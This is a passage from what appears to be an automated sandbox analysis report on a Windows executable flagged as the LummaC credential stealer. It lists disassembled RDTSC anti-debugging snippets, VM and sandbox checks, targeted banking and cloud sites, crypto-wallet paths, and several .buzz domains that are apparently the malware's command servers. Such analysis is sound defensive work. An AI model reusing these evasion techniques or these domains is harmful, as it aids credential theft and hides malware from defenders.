                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50A05F9 second address: 50A0611 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2830CF2D34h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50A0611 second address: 50A0629 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F2830CEE56Dh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50A0629 second address: 50A0670 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2830CF2D31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F2830CF2D38h 0x00000011 sub cl, FFFFFFF8h 0x00000014 jmp 00007F2830CF2D2Bh 0x00000019 popfd 0x0000001a popad 0x0000001b xchg eax, ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50A0670 second address: 50A0676 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50A0676 second address: 50A06CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, 70h 0x00000005 mov eax, edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c call 00007F2830CF2D2Ch 0x00000011 mov dx, si 0x00000014 pop eax 0x00000015 pushad 0x00000016 jmp 00007F2830CF2D39h 0x0000001b popad 0x0000001c popad 0x0000001d xchg eax, ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F2830CF2D38h 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50A06CB second address: 50A06DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2830CEE56Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50A06DA second address: 50A06E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50A06E0 second address: 50A06E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50A06FE second address: 50A0710 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2830CF2D2Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50A0710 second address: 50A0714 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50A0073 second address: 50A00BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2830CF2D2Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c jmp 00007F2830CF2D2Eh 0x00000011 mov ebp, esp 0x00000013 pushad 0x00000014 mov ecx, 5401355Dh 0x00000019 pushad 0x0000001a mov edi, ecx 0x0000001c call 00007F2830CF2D34h 0x00000021 pop eax 0x00000022 popad 0x00000023 popad 0x00000024 push esp 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 mov ax, 6939h 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50A00BF second address: 50A013F instructions: 0x00000000 rdtsc 0x00000002 mov cx, 5FF5h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushfd 0x00000009 jmp 00007F2830CEE572h 0x0000000e xor ecx, 0BE28B48h 0x00000014 jmp 00007F2830CEE56Bh 0x00000019 popfd 0x0000001a popad 0x0000001b mov dword ptr [esp], ecx 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F2830CEE574h 0x00000025 or si, 4DA8h 0x0000002a jmp 00007F2830CEE56Bh 0x0000002f popfd 0x00000030 push eax 0x00000031 mov ecx, edx 0x00000033 pop ebx 0x00000034 popad 0x00000035 mov dword ptr [ebp-04h], 55534552h 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007F2830CEE578h 0x00000045 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50A013F second address: 50A0143 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50A0143 second address: 50A0149 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50A0149 second address: 50A014E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50A0166 second address: 50A016B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50A016B second address: 50A0171 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50A0171 second address: 50A0175 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50A0175 second address: 50A0179 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50A0B06 second address: 50A0B47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F2830CEE56Fh 0x00000009 jmp 00007F2830CEE573h 0x0000000e popfd 0x0000000f mov ax, 223Fh 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F2830CEE570h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50A0B47 second address: 50A0B6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop esi 0x00000005 jmp 00007F2830CF2D2Dh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F2830CF2D2Dh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50A0B6C second address: 50A0B89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2830CEE571h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push ecx 0x0000000f pop edx 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50A0CCB second address: 50A0CDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2830CF2D2Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50A0D4D second address: 50A0D51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50A0D51 second address: 50A0D57 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50A0D57 second address: 50A0D5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50A0D5D second address: 50A0D78 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2830CF2D2Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test al, al 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50A0D78 second address: 50A0D80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cx, di 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50A0D80 second address: 50A0D86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50A0D86 second address: 50A0D8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50B0986 second address: 50B09B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, ebx 0x00000005 mov bx, B06Ah 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d jmp 00007F2830CF2D2Eh 0x00000012 mov dword ptr [esp], esi 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F2830CF2D2Ah 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50B09B2 second address: 50B09C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2830CEE56Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50B09C1 second address: 50B0A82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2830CF2D39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+0Ch] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F2830CF2D38h 0x00000013 sbb si, D518h 0x00000018 jmp 00007F2830CF2D2Bh 0x0000001d popfd 0x0000001e popad 0x0000001f test esi, esi 0x00000021 pushad 0x00000022 push esi 0x00000023 mov bh, 58h 0x00000025 pop esi 0x00000026 movsx ebx, ax 0x00000029 popad 0x0000002a je 00007F28A16D06C5h 0x00000030 jmp 00007F2830CF2D34h 0x00000035 cmp dword ptr [75AF459Ch], 05h 0x0000003c pushad 0x0000003d pushfd 0x0000003e jmp 00007F2830CF2D2Eh 0x00000043 jmp 00007F2830CF2D35h 0x00000048 popfd 0x00000049 mov si, CA87h 0x0000004d popad 0x0000004e je 00007F28A16E8759h 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007F2830CF2D34h 0x0000005d rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50B0A82 second address: 50B0A91 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2830CEE56Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50B0A91 second address: 50B0AB5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2830CF2D39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50B0AB5 second address: 50B0AB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50B0AB9 second address: 50B0ABF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50B0ABF second address: 50B0ADC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2830CEE572h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50B0ADC second address: 50B0AE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50B0AE0 second address: 50B0AE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50B0B29 second address: 50B0B50 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2830CF2D2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F2830CF2D35h 0x00000011 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeSpecial instruction interceptor: First address: AF8CC4 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeSpecial instruction interceptor: First address: AF8C10 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeSpecial instruction interceptor: First address: C9175C instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeSpecial instruction interceptor: First address: CA141D instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeSpecial instruction interceptor: First address: D19880 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00AF9125 rdtsc 0_2_00AF9125
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe TID: 6104Thread sleep time: -300000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe TID: 3288Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: 3LUyRfIoKs.exe, 3LUyRfIoKs.exe, 00000000.00000002.2349404536.0000000000C72000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2218315325.0000000005A1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2218315325.0000000005A1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2218315325.0000000005A1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2218315325.0000000005A1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2218315325.0000000005A1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2218066583.0000000005A8E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696428655p
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2218315325.0000000005A1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: 3LUyRfIoKs.exe, 00000000.00000002.2350224490.0000000001349000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2192782613.00000000013A5000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2294833870.00000000013A3000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2170149537.00000000013A5000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2339617530.00000000013A3000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2269059253.00000000013A3000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000002.2350224490.00000000013A3000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2268524976.00000000013A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2218315325.0000000005A1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2218315325.0000000005A1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2218315325.0000000005A1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2218315325.0000000005A1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2218315325.0000000005A1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2218315325.0000000005A1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2218315325.0000000005A1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2218315325.0000000005A1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2218315325.0000000005A1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2218315325.0000000005A1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2218315325.0000000005A1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2218315325.0000000005A1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2218315325.0000000005A1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2218066583.0000000005A89000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2218315325.0000000005A1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2218315325.0000000005A1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2218315325.0000000005A1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2218315325.0000000005A1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2218315325.0000000005A1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2218315325.0000000005A1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2218315325.0000000005A1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2218066583.0000000005A8E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: YNVMware
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2339664990.0000000001391000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2192856315.0000000001391000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2170200355.0000000001391000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000002.2350224490.0000000001391000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2294897450.0000000001391000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2269185340.0000000001391000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(yK
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2218315325.0000000005A1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2218315325.0000000005A1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: 3LUyRfIoKs.exe, 00000000.00000002.2349404536.0000000000C72000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2218315325.0000000005A1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2218315325.0000000005A1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: SICE
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00AF9125 rdtsc 0_2_00AF9125
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00ADE110 LdrInitializeThunk,0_2_00ADE110

                HIPS / PFW / Operating System Protection Evasion

                barindex
                LummaC encrypted strings found
                Source: 3LUyRfIoKs.exeString found in binary or memory: hummskitnj.buzz
                Source: 3LUyRfIoKs.exeString found in binary or memory: appliacnesot.buzz
                Source: 3LUyRfIoKs.exeString found in binary or memory: cashfuzysao.buzz
                Source: 3LUyRfIoKs.exeString found in binary or memory: inherineau.buzz
                Source: 3LUyRfIoKs.exeString found in binary or memory: screwamusresz.buzz
                Source: 3LUyRfIoKs.exeString found in binary or memory: rebuildeso.buzz
                Source: 3LUyRfIoKs.exeString found in binary or memory: scentniej.buzz
                Source: 3LUyRfIoKs.exeString found in binary or memory: mindhandru.buzz
                Source: 3LUyRfIoKs.exeString found in binary or memory: prisonyfork.buzz
                Source: 3LUyRfIoKs.exe, 3LUyRfIoKs.exe, 00000000.00000002.2349404536.0000000000C72000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: MProgram Manager
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2339617530.0000000001397000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000002.2350224490.0000000001398000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000002.2353177741.00000000059E4000.00000004.00000800.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2294833870.0000000001397000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Yara detected LummaC Stealer
                Source: Yara matchFile source: Process Memory Space: 3LUyRfIoKs.exe PID: 5856, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Found many strings related to Crypto-Wallets (likely being stolen)
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2269059253.00000000013A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum-LTC
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2269059253.00000000013A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
